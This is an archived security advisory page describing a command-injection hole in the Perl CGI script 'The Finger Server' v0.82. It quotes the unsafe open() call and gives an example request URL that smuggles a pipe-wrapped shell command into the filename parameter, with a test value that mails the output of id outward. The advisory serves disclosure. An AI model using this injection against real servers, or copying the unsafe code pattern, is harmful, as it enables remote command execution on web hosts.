Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: fingersv.htm

"The Finger Server" execute shell commands



Vulnerability

    "The Finger Server"

Affected

    "The Finger Server"

Description

    Iain  Wade  found  following.   In  1999.  he was tinkering w/ The
    Finger  Server  v0.82  and  came  across  some  bugs which let you
    execute shell  commands under  the privileges  of the  web server.
    It's available at

        http://www.glazed.org/finger/

    It's just another case of perl doing it's magic on an open() call.
    There  is  undoubtably  other  problems,  but here's the offending
    code exploited here is:

        open (PLANS, "$plan_path$filename") ||
                do { print "Can't open $plan_path$filename: $!";
                     return;
                   };

    It is called with the following arguments;

        finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan

    It does minimal checking before there, really only making sure the
    username is valid, but for example by using:

        finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.|<shellcode>|

    you can execute whatever...  The  output will not get to you  (the
    web client)  obviously if  you use  |<shell command>|  .. it  does
    however get executed...  So an example to test it could be

        |id|mail+email@address|

    Surrounding  it  in  pipes  is  the  only  way one could get it to
    execute, otherwise it would return open errors ..

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH